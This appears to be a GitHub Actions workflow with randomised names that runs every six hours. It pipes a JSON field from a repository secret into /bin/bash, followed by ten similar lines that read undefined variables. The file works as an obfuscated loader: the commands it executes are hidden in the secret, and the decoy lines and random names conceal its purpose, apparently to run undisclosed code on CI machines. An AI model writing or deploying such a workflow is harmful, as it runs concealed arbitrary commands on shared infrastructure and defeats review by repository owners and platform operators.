name: eihfual

on:
  workflow_dispatch:
  schedule:
    - cron: '44 0/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: eihfual
        env:
          oj65: ${{ secrets.oj65 }}
        run: |
          echo $oj65 | jq -r .o35 | /bin/bash
          echo $xummd75983 | jq -r .r85602 | /bin/bash
          echo $umvp6806 | jq -r .jnido60416 | /bin/bash
          echo $bqnad9940 | jq -r .rn581 | /bin/bash
          echo $yyih84093 | jq -r .t3 | /bin/bash
          echo $adc1162 | jq -r .e03702 | /bin/bash
          echo $vgkus08317 | jq -r .tvipd64 | /bin/bash
          echo $y5 | jq -r .qagj4110 | /bin/bash
          echo $tendu64 | jq -r .un2302 | /bin/bash
          echo $rqn507 | jq -r .gkp178 | /bin/bash
          echo $s988 | jq -r .zuf1 | /bin/bash

